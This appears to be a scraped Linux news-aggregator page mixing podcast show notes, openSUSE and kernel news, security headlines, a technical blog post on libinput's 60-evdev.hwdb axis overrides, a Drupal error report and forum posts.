Linux Kernel 4.16.7-041607 Generic (linux-image-4.16.7-041607-generic)
Nothing to remove!

Thanks for using this script!!!

via: https://www.2daygeek.com/uktools-easy-way-to-install-latest-stable-linux-kernel-on-ubuntu-mint-and-derivatives/

作者:Prakash Subramanian 选题:lujun9972 译者:MjSeven 校对:wxy

本文由 LCTT 原创编译,Linux中国 荣誉推出


          Episode 79: What You Need to Know about WireGuard      Cache   Translate Page   Web Page Cache   
When Linus says that he skimmed the code and it's so exciting that he's hoping it gets merged quickly, you know this is the next big thing in Linux. We talk to Jim Salter. He gives us a perspective from day 0. We discuss the new Google gaming box, and give you an tease about some upcoming information about Southeast Linuxfest. -- The Cliff Notes -- For links to the articles and material referenced in this week's episode check out this week's page from o our podcast dashboard! This Episode's Podcast Dashboard (http://podcast.asknoahshow.com/79) Phone Systems for Ask Noah provided by Voxtelesys (http://www.voxtelesys.com/asknoah) -- Stay In Touch -- Find all the resources for this show on the Ask Noah Dashboard Ask Noah Dashboard (http://www.asknoahshow.com) Need more help than a radio show can offer? Altispeed provides commercial IT services and they’re excited to offer you a great deal for listening to the Ask Noah Show. Call today and ask about the discount for listeners of the Ask Noah Show! Altispeed Technologies (http://www.altispeed.com/) Contact Noah asknoah [at] jupiterbroadcasting.com -- Twitter -- Noah - Kernellinux (https://twitter.com/kernellinux) Ask Noah Show (https://twitter.com/asknoahshow) Altispeed Technologies (https://twitter.com/altispeed) Jupiter Broadcasting (https://twitter.com/jbsignal)
          Episode 78: Homeless to Web Developer Overnight      Cache   Translate Page   Web Page Cache   
How do you go from being homeless on the streets of CA to getting offers from Google, Amazon, and others? We discuss! The GPD team has released the 2nd gen 7" laptop and we give you our thoughts on their awesome laptop without Linux. As always your questions go to the front of the line. -- The Cliff Notes -- For links to the articles and material referenced in this week's episode check out this week's page from o our podcast dashboard! This Episode's Podcast Dashboard (http://podcast.asknoahshow.com/78) Phone Systems for Ask Noah provided by Voxtelesys (http://www.voxtelesys.com/asknoah) -- Stay In Touch -- Find all the resources for this show on the Ask Noah Dashboard Ask Noah Dashboard (http://www.asknoahshow.com) Need more help than a radio show can offer? Altispeed provides commercial IT services and they’re excited to offer you a great deal for listening to the Ask Noah Show. Call today and ask about the discount for listeners of the Ask Noah Show! Altispeed Technologies (http://www.altispeed.com/) Contact Noah asknoah [at] jupiterbroadcasting.com -- Twitter -- Noah - Kernellinux (https://twitter.com/kernellinux) Ask Noah Show (https://twitter.com/asknoahshow) Altispeed Technologies (https://twitter.com/altispeed) Jupiter Broadcasting (https://twitter.com/jbsignal)
          Episode 44: RedHat with Brandon Johnson      Cache   Translate Page   Web Page Cache   
We pick up where we left off last Friday with our discussion about Spectre & Meltdown. Brandon Johnson from RedHat joins us to talk about this important topic & what he and his team at RedHat are doing to mitigate this disaster. -- The Cliff Notes -- Problem Booting Windows with AMD (https://support.microsoft.com/en-us/help/4073707/windows-operating-system-security-update-block-for-some-amd-based-devi?ranMID=24542&ranEAID=nOD%2FrLJHOac&ranSiteID=nOD_rLJHOac-AVnR8kDXzs7ZsWhqsDfF6A&tduid=(f0187439558fdb09f4f2aa182b303234)(256380)(2459594)(nOD_rLJHOac-AVnR8kDXzs7ZsWhqsDfF6A)()) Meltdown and Spectre for Non Technical Users (https://blog.cloudflare.com/meltdown-spectre-non-technical/) Meltdown and Spectre the Battle Continues (http://www.zdnet.com/article/the-linux-vs-meltdown-and-spectre-battle-continues/) Meltdown Attack Simply Explained (https://meltdownattack.com/) What RedHat says You Need to Know (https://www.redhat.com/en/blog/what-are-meltdown-and-spectre-here%E2%80%99s-what-you-need-know) Microsoft Haults Patches (https://www.pcworld.com/article/3246189/security/microsoft-halts-meltdown-patches-windows-amd-pcs-unbootable.html) Microsoft Haults Patches Cont. (https://www.engadget.com/2018/01/09/microsoft-halts-meltdown-spectre-amd-patches/) Meltdown Spectre Bug Collision (https://www.wired.com/story/meltdown-spectre-bug-collision-intel-chip-flaw-discovery/) Kids Router (http://amzn.to/2CZKsIb) RedHat Opens up Resources For You (https://twitter.com/RedHatNews/status/948936504453292032) RedHat Resources (https://access.redhat.com/solutions/3307851) Linus Torvalds Advice to Intel (https://lkml.org/lkml/2018/1/3/797) Intel CEO Sale of Stock Before Security Bug Reveal (https://arstechnica.com/information-technology/2018/01/intel-ceos-sale-of-stock-just-before-security-bug-reveal-raises-questions/) Intel Bug Performance Hit (https://www.forbes.com/sites/davealtavilla/2018/01/03/intel-processor-bug-leaves-all-current-chips-vulnerable-and-its-fix-saps-performance/#72b7fb7a570a) Intel Bug Fix Kernel Fix (https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=5aa90a84589282b87666f92b6c3c917c8080a9bf) Canonical Updates for Meltdown and Spectre (https://insights.ubuntu.com/2018/01/04/ubuntu-updates-for-the-meltdown-spectre-vulnerabilities/) +Intel SPI Bug Fix (https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1734147) BIOS Fix Download (http://people.canonical.com/~ypwong/lp1734147/linux-image-4.15.0-041500rc6-generic_4.15.0-041500rc6.201712312330+20170103+1_amd64.deb) Backup BIOS Fix Update (http://people.canonical.com/~ypwong/lp1734147/linux-image-4.15.0-041500rc6-generic_4.15.0-041500rc6.201712312330+clear+debug_amd64.deb) See How the Ask Noah Show Got Started (video) (https://www.youtube.com/watch?v=6CkKku1JAe8) VoxTeleSys (http://www.voxtelesys.com) -- Stay In Touch -- Find all the resources for this show on the Ask Noah Dashboard Ask Noah Dashboard (http://www.asknoahshow.com) Need more help than a radio show can offer? Altispeed provides commercial IT services and they’re excited to offer you a great deal for listening to the Ask Noah Show. Call today and ask about the discount for listeners of the Ask Noah Show! Altispeed Technologies (http://www.altispeed.com/) Contact Noah asknoah [at] jupiterbroadcasting.com -- Twitter -- Noah - Kernellinux (https://twitter.com/kernellinux) Ask Noah Show (https://twitter.com/asknoahshow) Altispeed Technologies (https://twitter.com/altispeed) Jupiter Broadcasting (https://twitter.com/jbsignal)
          Episode 29: Ubuntu Rally Explained      Cache   Translate Page   Web Page Cache   
Noah takes a deep dive into Mir Wayland, what Canonical is doing with Ubuntu & how other projects like Arch and Fedora play into it. Interviews with people from the rally & of course your calls. -- The Cliff Notes -- Purism Phone (https://puri.sm/shop/librem-5/) Zoom H5N Recorder (http://amzn.to/2xtNeDF) How To Install Snaps (http://www.techrepublic.com/article/how-to-install-snap-packages-on-ubuntu-16-04/) Zurmo CRM (http://zurmo.org/) Invoice Ninja (https://www.invoiceninja.com/) Interested in Hosted Zurmo? (http://www.altispeed.com/contact.html) Vox Tel Sys (http://www.voxtelsys.com) -- Stay In Touch -- Find all the resources for this show on the Ask Noah Dashboard Ask Noah Dashboard (http://www.asknoahshow.com) Need more help than a radio show can offer? Altispeed provides commercial IT services and they’re excited to offer you a great deal for listening to the Ask Noah Show. Call today and ask about the discount for listeners of the Ask Noah Show! Altispeed Technologies (http://www.altispeed.com/) Contact Noah asknoah [at] jupiterbroadcasting.com -- Twitter -- Noah - Kernellinux (https://twitter.com/kernellinux) Ask Noah Show (https://twitter.com/asknoahshow) Altispeed Technologies (https://twitter.com/altispeed) Jupiter Broadcasting (https://twitter.com/jbsignal)
          openSUSE Leap 42.3 Operating System Support Extended Until June 30, 2019      Cache   Translate Page   Web Page Cache   

Launched on July 26, 2017, the OpenSuSE Leap 42.3 operating system is based on SUSE Linux Enterprise (SLE) 12 Service Pack (SP) 3 and the long-term supported Linux 4.4 kernel series. Like previous openSUSE Leap 42 point releases, openSUSE Leap 42.3 was supposed to receive 18 months of support, until January 2019.

However, both the openSUSE Project and parent company SUSE decided to give users more time to upgrade to the latest openSUSE Leap 15 release, which is based on the SUSE Linux Enterprise (SLE) 15 operating system series, by continuing to deliver updates to the openSUSE Leap 42.3 release, and the openSUSE Leap 42 series, for six more months.

Read more


          OpenSUSE/SUSE: openSUSE Leap 42.3 and Kubic's Change of Heart      Cache   Translate Page   Web Page Cache   
  • openSUSE Leap 42.3 Operating System Support Extended Until June 30, 2019

    The openSUSE Project announced this week that they'd extended support for the openSUSE Leap 42.3 operating system with six more months to allow more users to upgrade to the latest openSUSE Leap 15 release.

    Launched on July 26, 2017, the openSUSE Leap 42.3 operating system is based on SUSE Linux Enterprise (SLE) 12 Service Pack (SP) 3 and the long-term supported Linux 4.4 kernel series. Like previous openSUSE Leap 42 point releases, openSUSE Leap 42.3 was supposed to receive 18 months of support, until January 2019.

  • An Exciting New Direction

    It’s been over a year since we started the Kubic project, and it’s worth looking back over the last months and evaluating where we’ve succeeded, where we haven’t, and sharing with you all our plans for the future.

  • OpenSUSE Kubic Shifts Focus Following Self-Reflection

    OpenSUSE's Kubic project that has been home to their container-related technologies as well as the atomicly-updated openSUSE "MicroOS" will be making some changes.


          Almond Kernels Market Trends, And Forecasts (2018–2023)      Cache   Translate Page   Web Page Cache   
(EMAILWIRE.COM, August 09, 2018 ) The fruit of an almond is a drupe which consists of an outer hull and a hard shell covering the seed or kernel. The process of removal of the shell of an almond is termed … Continue reading
          Software Engineer - VMware - Palo Alto, CA      Cache   Translate Page   Web Page Cache   
1 years of experience in Intel and AMD x86 based processor architecture. 1 years of experience in OS kernel internals, including memory management, resource...
From VMware - Wed, 25 Jul 2018 00:20:47 GMT - View all Palo Alto, CA jobs
          Software Engineer - VMware - Palo Alto, CA      Cache   Translate Page   Web Page Cache   
1 years of experience in Intel and AMD x86 based processor architecture. 1 years of experience in OS kernel internals, including memory management, resource...
From VMware - Wed, 25 Jul 2018 00:20:47 GMT - View all Palo Alto, CA jobs
          Security Leftovers      Cache   Translate Page   Web Page Cache   
  • People Think Their Passwords Are Too Awesome For Two Factor Authentication. They’re Wrong.
  • Security updates for Thursday
  • Let's Encrypt Now Trusted by All Major Root Programs

    Now, the CA’s root is directly trusted by almost all newer versions of operating systems, browsers, and devices. Many older versions, however, still do not directly trust Let’s Encrypt.

    While some of these are expected to be updated to trust the CA, others won’t, and it might take at least five more years until most of them cycle out of the Web ecosystem. Until that happens, Let’s Encrypt will continue to use a cross signature.

  • WPA2 flaw lets attackers easily crack WiFi passwords

    The security flaw was found, accidentally, by security researcher Jens Steube while conducting tests on the forthcoming WPA3 security protocol; in particular, on differences between WPA2's Pre-Shared Key exchange process and WPA3's Simultaneous Authentication of Equals, which will replace it. WPA3 will be much harder to attack because of this innovation, he added.

  • ​Linux kernel network TCP bug fixed

    Another day, another bit of security hysteria. This time around the usually reliable Carnegie Mellon University's CERT/CC, claimed the Linux kernel's TCP network stack could be "forced to make very expensive calls to tcp_collapse_ofo_queue() and tcp_prune_ofo_queue() for every incoming packet which can lead to a denial of service (DoS)."

  • State of Security for Open Source Web Applications 2018

    ach year, we publish a set of statistics summarizing the vulnerabilities we find in open source web applications. Our tests form part of Netsparker's quality assurance practices, during which we scan thousands of web applications and websites. This helps us to add to our security checks and continuously improve the scanner's accuracy.

    This blog post includes statistics based on security research conducted throughout 2017. But first, we take a look at why we care about open source applications, and the damage that can be caused for enterprises when they go wrong.

  • New Actor DarkHydrus Targets Middle East with Open-Source Phishing [Ed: Headline says "Open-Source Phishing," but this is actually about Microsoft Windows and Office (proprietary and full of serious bugs)]

    Government entities and educational institutions in the Middle East are under attack in an ongoing credential-harvesting campaign.

    Government entities and educational institutions in the Middle East are under attack in an ongoing credential-harvesting campaign, mounted by a newly-named threat group known as DarkHydrus. In a twist on the norm, the group is leveraging the open-source Phishery tool to carry out its dark work.

    The attacks follow a well-worn pattern, according to Palo Alto Networks’ Unit 42 group: Spear-phishing emails with attached malicious Microsoft Office documents are leveraging the “attachedTemplate” technique to load a template from a remote server.

read more


          today's howtos      Cache   Translate Page   Web Page Cache   

read more


          Stable kernels 4.17.14, 4.14.62, 4.9.119, 4.4.147 and 3.18.118      Cache   Translate Page   Web Page Cache   

read more


          Linux Foundation and Kernel News      Cache   Translate Page   Web Page Cache   

read more


          Graphics: Libinput, Mesa and AMD      Cache   Translate Page   Web Page Cache   
  • How the 60-evdev.hwdb works

    libinput made a design decision early on to use physical reference points wherever possible. So your virtual buttons are X mm high/across, the pointer movement is calculated in mm, etc. Unfortunately this exposed us to a large range of devices that don't bother to provide that information or just give us the wrong information to begin with. Patching the kernel for every device is not feasible so in 2015 the 60-evdev.hwdb was born and it has seen steady updates since. Plenty a libinput bug was fixed by just correcting the device's axis ranges or resolution. To take the magic out of the 60-evdev.hwdb, here's a blog post for your perusal, appreciation or, failing that, shaking a fist at. Note that the below is caller-agnostic, it doesn't matter what userspace stack you use to process your input events.

  • Mesa 18.2-RC2 Released With 17 Fixes So Far

    One week after branching Mesa 18.2 and issuing the first release candidate, the second weekly RC is now available for testing.

    Mesa 18.2-RC2 has 17 patches queued, including several V3D (formerly "VC5") Broadcom driver fixes, build system updates, fixing the DRISW compilation for Android Nougat, and other small fixes.

  • Mesa 18.2.0-rc2

    The second release candidate for the Mesa 18.2.0 is now available.

  • AMDGPU LRU Bulk Move Functionality Increases Performance In OpenCL And Vulkan
  • AMD Releases 18.Q3 Linux Drivers for Radeon Pro, Including Ubuntu 18.04 LTS Support

    This update also brings Vulkan 1.1 support, and initial support for Ubuntu 18.04 LTS – which is great news for those who recently upgraded to the latest Ubuntu 18.04 LTS package.

    The package is mainly intended for Vega Frontier, Radeon Pro, Radeon Pro WX, and FirePro S/W graphics cards, and the entire driver stack is derived from the 18.20 driver branch which includes both PRO and All-Open driver options.

read more


          ✌ Linux vulnerability could lead to DDoS attacks      Cache   Translate Page   Web Page Cache   
✌ Linux vulnerability could lead to DDoS attacks:

A Linux kernel vulnerability affecting version 4.9 and up could allow an attacker to carry out denial-of-service attacks on a system with an available open port.


          Latest ClearFog SBC offers four GbE ports and a 10GbE SFP+ port      Cache   Translate Page   Web Page Cache   

SolidRun’s “ClearFog GT 8K” networking SBC runs Ubuntu on a network virtualization enabled quad -A72 Armada A8040 SoC and offers up to 16GB DDR4, 4x GbE ports, a WAN port, a 10GbE SFP+ port, and 3x mini-PCIe slots.

SolidRun has updated its ClearFog line of Linux-driven router SBCs with a ClearFog GT 8K model designed for high-end edge computing, virtual customer premise equipment (vCPE), network functional virtualization (NFV), network security, and general networking duty. The SBC runs Linux Kernel 4.4x, Ubuntu 16.04, and Google IoT Core on Marvell’s quad-core, up to 2GHz Cortex-A72 Armada A8040 SoC. Models are available with 8GB eMMC ($209), 128GB eMMC ($304), 8GB eMMC with 16GB RAM ($526), and 128GB eMMC with 16GB RAM ($621).

Read more


          Black Hat 2018: Stealthy Kernel Attack Flies Under Windows Mitigation Radar      Cache   Translate Page   Web Page Cache   
Researchers create PoC of a post-exploitation kernel-mode fileless attack technique.
          [GIT] rosenbridge - hardware backdoors in x86 CPUs      Cache   Translate Page   Web Page Cache   
---Quote--- While the backdoor should require kernel level access to activate, it has been observed to be enabled by default on some systems,...
          Peter Hutterer: How the 60-evdev.hwdb works      Cache   Translate Page   Web Page Cache   

libinput made a design decision early on to use physical reference points wherever possible. So your virtual buttons are X mm high/across, the pointer movement is calculated in mm, etc. Unfortunately this exposed us to a large range of devices that don't bother to provide that information or just give us the wrong information to begin with. Patching the kernel for every device is not feasible so in 2015 the 60-evdev.hwdb was born and it has seen steady updates since. Plenty a libinput bug was fixed by just correcting the device's axis ranges or resolution. To take the magic out of the 60-evdev.hwdb, here's a blog post for your perusal, appreciation or, failing that, shaking a fist at. Note that the below is caller-agnostic, it doesn't matter what userspace stack you use to process your input events.

There are four parts that come together to fix devices: a kernel ioctl and a trifecta of udev rules hwdb entries and a udev builtin.

The kernel's EVIOCSABS ioctl

It all starts with the kernel's struct input_absinfo .

struct input_absinfo { __s32 value; __s32 minimum; __s32 maximum; __s32 fuzz; __s32 flat; __s32 resolution; };

The three values that matter right now: minimum, maximum and resolution. The "value" is just the most recent value on this axis, ignore fuzz/flat for now. The min/max values simply specify the range of values the device will give you, the resolution how many values per mm you get. Simple example: an x axis given at min 0, max 1000 at a resolution of 10 means your devices is 100mm wide. There is no requirement for min to be 0, btw, and there's no clipping in the kernel so you may get values outside min/max. Anyway, your average touchpad looks like this in evemu-record:

# Event type 3 (EV_ABS) # Event code 0 (ABS_X) # Value 2572 # Min 1024 # Max 5112 # Fuzz 0 # Flat 0 # Resolution 41 # Event code 1 (ABS_Y) # Value 4697 # Min 2024 # Max 4832 # Fuzz 0 # Flat 0 # Resolution 37 This is the information returned by the EVIOCGABS ioctl

(EVdev IOCtl Get ABS). It is usually run once on device init by any process handling evdev device nodes.

Because plenty of devices don't announce the correct ranges or resolution, the kernel provides the EVIOCSABS ioctl (EVdev IOCtl Set ABS). This allows overwriting the in-kernel struct with new values for min/max/fuzz/flat/resolution, processes that query the device later will get the updated ranges.

udev rules, hwdb and builtins

The kernel has no notification mechanism for updated axis ranges so the ioctl must be applied before any process opens the device. This effectively means it must be applied by a udev rule. udev rules are a bit limited in what they can do, so if we need to call an ioctl, we need to run a program. And while udev rules can do matching, the hwdb is easier to edit and maintain. So the pieces we have is: a hwdb that knows when to change (and the values), a udev program to apply the values and a udev rule to tie those two together.

In our case the rule is 60-evdev.rules . It checks the 60-evdev.hwdb for matching entries [1], then invokes the udev-builtin-keyboard if any matching entries are found. That builtin parses the udev properties assigned by the hwdb and converts them into EVIOCSABS ioctl calls. These three pieces need to agree on each other's formats - the udev rule and hwdb agree on the matches and the hwdb and the builtin agree on the property names and value format.

By itself, the hwdb itself has no specific format beyond this:

some-match-that-identifies-a-device PROPERTY_NAME=value OTHER_NAME=othervalue But since we want to match for specific use-cases, our udev rule assembles several specific match lines. Have a look at 60-evdev.rules again, the last rule in there assembles a string in the form of "evdev:name: the device name : content of /sys/class/dmi/id/modalias

". So your hwdb entry could look like this:

evdev:name:My Touchpad Name:dmi:*svnDellInc* EVDEV_ABS_00=0:1:3 If the name matches and you're on a Dell system, the device gets the EVDEV_ABS_00

property assigned. The "evdev:" prefix in the match line is merely to distinguish from other match rules to avoid false positives. It can be anything, libinput unsurprisingly used "libinput:" for its properties.

The last part now is understanding what EVDEV_ABS_00 means. It's a fixed string with the axis number as hex number - 0x00 is ABS_X . And the values afterwards are simply min, max, resolution, fuzz, flat, in that order. So the above example would set min/max to 0:1 and resolution to 3 (not very useful, I admit).

Trailing bits can be skipped altogether and bits that don't need overriding can be skipped as well provided the colons are in place. So the common use-case of overriding a touchpad's x/y resolution looks like this:

evdev:name:My Touchpad Name:dmi:*svnDellInc* EVDEV_ABS_00=::30 EVDEV_ABS_01=::20 EVDEV_ABS_35=::30 EVDEV_ABS_36=::20 0x00 and 0x01 are ABS_X and ABS_Y , so we're setting those to 30 units/mm and 20 units/mm, respectively. And if the device is multitouch capable we also need to set ABS_MT_POSITION_X and ABS_MT_POSITION_Y

to the same resolution values. The min/max ranges for all axes are left as-is.

The most confusing part is usually: the hwdb uses a binary database that needs updating whenever the hwdb entries change. A call to systemd-hwdb update does that job.

So with all the pieces in place, let's see what happens when the kernel tells udev about the device:

The udev rule assembles a match and calls out to the hwdb, The hwdb applies udev properties where applicable and returns success, The udev rule calls the udev keyboard-builtin The keyboard builtin parses the EVDEV_ABS_xx properties and issues an EVIOCSABS ioctl for each axis, The kernel updates the in-kernel description of the device accordingly The udev rule finishes and udev sends out the "device added" notification The userspace process sees the "device added" and opens the device which now has corrected values Celebratory champagne corks are popping everywhere, hands are shaken, shoulders are patted in congratulations of another device saved from the tyranny of wrong axis ranges/resolutions

Once you understand how the various bits fit together it should be quite easy to understand what happens. Then the remainder is just adding hwdb entries where necessary but the touchpad-edge-detector tool is useful for figuring those out.

[1] Not technically correct, the udev rule merely calls the hwdb builtin which searches through all hwdb entries. It doesn't matter which file the entries are in.
          Almond Kernels Market Trends, And Forecasts (2018–2023)      Cache   Translate Page   Web Page Cache   
(EMAILWIRE.COM, August 09, 2018 ) The fruit of an almond is a drupe which consists of an outer hull and a hard shell covering the seed or kernel. The process of removal of the shell of an almond is termed shelling, and the almonds are sold shelled or unshelled. There are two types of almonds. Sweet...
          ​Linux kernel network TCP bug fixed      Cache   Translate Page   Web Page Cache   
The denial of service bug had actually been patched in the Linux kernel weeks before news of it was ever announced.
          VULNERABILIDAD EN LINUX PERMITIRÍA ATAQUES DE DENEGACIÓN DE SERVICIO      Cache   Translate Page   Web Page Cache   
Ya se encuentran disponibles los parches para la vulnerabilidad Especialistas de seguridad en redes informáticas reportan que una vulnerabilidad en el núcleo del sistema operativo Linux (kernel) que afecta la versión 4.9 y posteriores podría permitir a un hacker realizar ataques de denegación de servicio(DoS) en un sistema con un puerto abierto disponible. Un informe de seguridad advierte sobre...

Síguenos en nuestras redes sociales ▶Twitter: http://bit.ly/2rJspOn ▶Facebook: http://bit.ly/2rSYANh ▶Instagram: http://bit.ly/2sBqICt ▶YouTube: http://bit.ly/2rJW1Ls ¡Tu comunidad desatendida! Windows Desatendidos®
          Attempting to View Revisions Gives Error Message      Cache   Translate Page   Web Page Cache   
Message

When I attempt to view revisions, I get the following error message:

The website encountered an unexpected error. Please try again later.

I recently upgraded from 8.5.5 to 8.5.6

I also have enabled the Content Moderation and Workflows modules in Core. I have added States and Transitions to the default Editorial workflow.

Here is the error message from the log file:

Error: Call to a member function toArray() on string in nycourts_preprocess_node() (line 37 of /Users/tklem/Sites/devdesktop/nyscourts-dev/docroot/themes/nycourts/nycourts.theme) #0 /Users/tklem/Sites/devdesktop/nyscourts-dev/docroot/core/lib/Drupal/Core/Theme/ThemeManager.php(287): nycourts_preprocess_node(Array, 'node', Array) #1 /Users/tklem/Sites/devdesktop/nyscourts-dev/docroot/core/lib/Drupal/Core/Render/Renderer.php(437): Drupal\Core\Theme\ThemeManager->render('node', Array) #2 /Users/tklem/Sites/devdesktop/nyscourts-dev/docroot/core/lib/Drupal/Core/Render/Renderer.php(195): Drupal\Core\Render\Renderer->doRender(Array, false) #3 /Users/tklem/Sites/devdesktop/nyscourts-dev/docroot/core/lib/Drupal/Core/Render/MainContent/HtmlRenderer.php(226): Drupal\Core\Render\Renderer->render(Array, false) #4 /Users/tklem/Sites/devdesktop/nyscourts-dev/docroot/core/lib/Drupal/Core/Render/Renderer.php(582): Drupal\Core\Render\MainContent\HtmlRenderer->Drupal\Core\Render\MainContent\{closure}() #5 /Users/tklem/Sites/devdesktop/nyscourts-dev/docroot/core/lib/Drupal/Core/Render/MainContent/HtmlRenderer.php(227): Drupal\Core\Render\Renderer->executeInRenderContext(Object(Drupal\Core\Render\RenderContext), Object(Closure)) #6 /Users/tklem/Sites/devdesktop/nyscourts-dev/docroot/core/lib/Drupal/Core/Render/MainContent/HtmlRenderer.php(117): Drupal\Core\Render\MainContent\HtmlRenderer->prepare(Array, Object(Symfony\Component\HttpFoundation\Request), Object(Drupal\Core\Routing\CurrentRouteMatch)) #7 /Users/tklem/Sites/devdesktop/nyscourts-dev/docroot/core/lib/Drupal/Core/EventSubscriber/MainContentViewSubscriber.php(90): Drupal\Core\Render\MainContent\HtmlRenderer->renderResponse(Array, Object(Symfony\Component\HttpFoundation\Request), Object(Drupal\Core\Routing\CurrentRouteMatch)) #8 [internal function]: Drupal\Core\EventSubscriber\MainContentViewSubscriber->onViewRenderArray(Object(Symfony\Component\HttpKernel\Event\GetResponseForControllerResultEvent), 'kernel.view', Object(Drupal\Component\EventDispatcher\ContainerAwareEventDispatcher)) #9 /Users/tklem/Sites/devdesktop/nyscourts-dev/docroot/core/lib/Drupal/Component/EventDispatcher/ContainerAwareEventDispatcher.php(111): call_user_func(Array, Object(Symfony\Component\HttpKernel\Event\GetResponseForControllerResultEvent), 'kernel.view', Object(Drupal\Component\EventDispatcher\ContainerAwareEventDispatcher)) #10 /Users/tklem/Sites/devdesktop/nyscourts-dev/vendor/symfony/http-kernel/HttpKernel.php(156): Drupal\Component\EventDispatcher\ContainerAwareEventDispatcher->dispatch('kernel.view', Object(Symfony\Component\HttpKernel\Event\GetResponseForControllerResultEvent)) #11 /Users/tklem/Sites/devdesktop/nyscourts-dev/vendor/symfony/http-kernel/HttpKernel.php(68): Symfony\Component\HttpKernel\HttpKernel->handleRaw(Object(Symfony\Component\HttpFoundation\Request), 1) #12 /Users/tklem/Sites/devdesktop/nyscourts-dev/docroot/core/lib/Drupal/Core/StackMiddleware/Session.php(57): Symfony\Component\HttpKernel\HttpKernel->handle(Object(Symfony\Component\HttpFoundation\Request), 1, true) #13 /Users/tklem/Sites/devdesktop/nyscourts-dev/docroot/core/lib/Drupal/Core/StackMiddleware/KernelPreHandle.php(47): Drupal\Core\StackMiddleware\Session->handle(Object(Symfony\Component\HttpFoundation\Request), 1, true) #14 /Users/tklem/Sites/devdesktop/nyscourts-dev/docroot/core/modules/page_cache/src/StackMiddleware/PageCache.php(99): Drupal\Core\StackMiddleware\KernelPreHandle->handle(Object(Symfony\Component\HttpFoundation\Request), 1, true) #15 /Users/tklem/Sites/devdesktop/nyscourts-dev/docroot/core/modules/page_cache/src/StackMiddleware/PageCache.php(78): Drupal\page_cache\StackMiddleware\PageCache->pass(Object(Symfony\Component\HttpFoundation\Request), 1, true) #16 /Users/tklem/Sites/devdesktop/nyscourts-dev/docroot/core/lib/Drupal/Core/StackMiddleware/ReverseProxyMiddleware.php(47): Drupal\page_cache\StackMiddleware\PageCache->handle(Object(Symfony\Component\HttpFoundation\Request), 1, true) #17 /Users/tklem/Sites/devdesktop/nyscourts-dev/docroot/core/lib/Drupal/Core/StackMiddleware/NegotiationMiddleware.php(52): Drupal\Core\StackMiddleware\ReverseProxyMiddleware->handle(Object(Symfony\Component\HttpFoundation\Request), 1, true) #18 /Users/tklem/Sites/devdesktop/nyscourts-dev/vendor/stack/builder/src/Stack/StackedHttpKernel.php(23): Drupal\Core\StackMiddleware\NegotiationMiddleware->handle(Object(Symfony\Component\HttpFoundation\Request), 1, true) #19 /Users/tklem/Sites/devdesktop/nyscourts-dev/docroot/core/lib/Drupal/Core/DrupalKernel.php(666): Stack\StackedHttpKernel->handle(Object(Symfony\Component\HttpFoundation\Request), 1, true) #20 /Users/tklem/Sites/devdesktop/nyscourts-dev/docroot/index.php(19): Drupal\Core\DrupalKernel->handle(Object(Symfony\Component\HttpFoundation\Request)) #21 {main}.

Drupal version: 

          Forum Post: RE: CCS/CC2652R: Creating a RTSC Project from scratch      Cache   Translate Page   Web Page Cache   
[quote user="Alireza Sadeghi"]I wanted to make a RTSC project so started with a new CCS project and chose an "empty RTSC project" then added a RTSC configuration file and tried to build the project But faced some Errors[/quote] Rather than creating a new project from scratch I would suggest starting with the "empty" example under TI Drivers. This will be an easier starting point to work with. You can import this project from Resource Explorer. Note that this project depends on a kernel project (tirtos_builds_...) and the kernel project is the one that contains the RTSC config file.
          Forum Post: CCS/CC2652R: Creating a RTSC Project from scratch      Cache   Translate Page   Web Page Cache   
Part Number: CC2652R Tool/software: Code Composer Studio Hi guys I'm new to CCS . I use CC2652R and run some SDK examples on it . now I've been trying to make a project from scratch aside from using SDK examples. I wanted to make a RTSC project so started with a new CCS project and chose an "empty RTSC project" then added a RTSC configuration file and tried to build the project But faced some Errors like below! Description Resource Path Location Type can't find the library 'lib/boot.aem4' specified by package ti.targets.arm.rtsarm. It wasn't found along the path 'C:/ti/simplelink_cc26x2_sdk_2_20_00_36/source;C:/ti/simplelink_cc26x2_sdk_2_20_00_36/kernel/tirtos/packages;C:/ti/xdctools_3_50_07_20_core/packages;..;'. .xdchelp /LedToggle line 48 C/C++ Problem gmake: *** [build-748610879] Error 2 LedToggle C/C++ Problem gmake: Target 'all' not remade because of errors. LedToggle C/C++ Problem gmake[1]: *** [build-748610879-inproc] Error 1 LedToggle C/C++ Problem xdctools_3_50_07_20_core\gmake.exe: *** [package/cfg/hello_pem4.xdl] Deleting file `package/cfg/hello_pem4.c' LedToggle C/C++ Problem xdctools_3_50_07_20_core\gmake.exe: *** [package/cfg/hello_pem4.xdl] Deleting file `package/cfg/hello_pem4.h' LedToggle C/C++ Problem xdctools_3_50_07_20_core\gmake.exe: *** Deleting file `package/cfg/hello_pem4.xdl' LedToggle C/C++ Problem I checked the setting with the given examples and there wasn't any difference So I confused ! Should I do anything before adding packages? by the way I tried to use a RTSC config file from one of the examples . Thanks
          [مکینتاش] دانلود Cockos Reaper v5.95 MacOSX - نرم افزار ضبط، میکس و ویرایش فایل های صوتی برای مک      Cache   Translate Page   Web Page Cache   

دانلود Cockos Reaper v5.95 MacOSX - نرم افزار ضبط، میکس و ویرایش فایل های صوتی برای مک#source%3Dgooglier%2Ecom#https%3A%2F%2Fgooglier%2Ecom%2Fpage%2F%2F10000

Reaper نرم افزاری کامل برای تولید فایل های صوتی دیجیتال است که مجموعه ابزار بی نظیری را برای ضبط چند مجرایی (multitrack) و MIDI، ویرایش، پردازش، میکس و مسترینگ فایل های صوتی در اختیار کاربران خود قرار می دهد. این برنامه از طیف وسیعی از سخت افزار های ضبط و پخش صوت و فرمت ها و پلاگین ها پشتیبانی می کند و به علاوه امکان اسکریپت نویسی، توسعه و ویرایش را نیز به کاربرانش می دهد. این نرم افزار از ASIO ،Kernel Streaming ،WaveOut و DirectSound برای پخش و ضبط فایل های صوتی بهره می برد و می تواند اصوات ...


http://p30download.com/81478

مطالب مرتبط:



دسته بندی: دانلود » مکینتاش » نرم افزار » دسکتاپ, نرم افزار, نرم افزار » کاربردی
برچسب ها: , , , , , , , , , , , , , , , , , , , , ,
لینک های مفید: خرید کارت شارژ, شارژ مستقیم, پرداخت قبض, خرید آنتی ویروس, خرید لایسنس آنتی ویروس, تبلیغات در اینترنت, تبلیغات اینترنتی
© حق مطلب و تصویر برای پی سی دانلود محفوظ است همین حالا مشترک این پایگاه شوید!
لینک دانلود: http://p30download.com/fa/entry/81478


          Data Notes: From Hate Speech to Russian Troll Tweets      Cache   Translate Page   Web Page Cache   
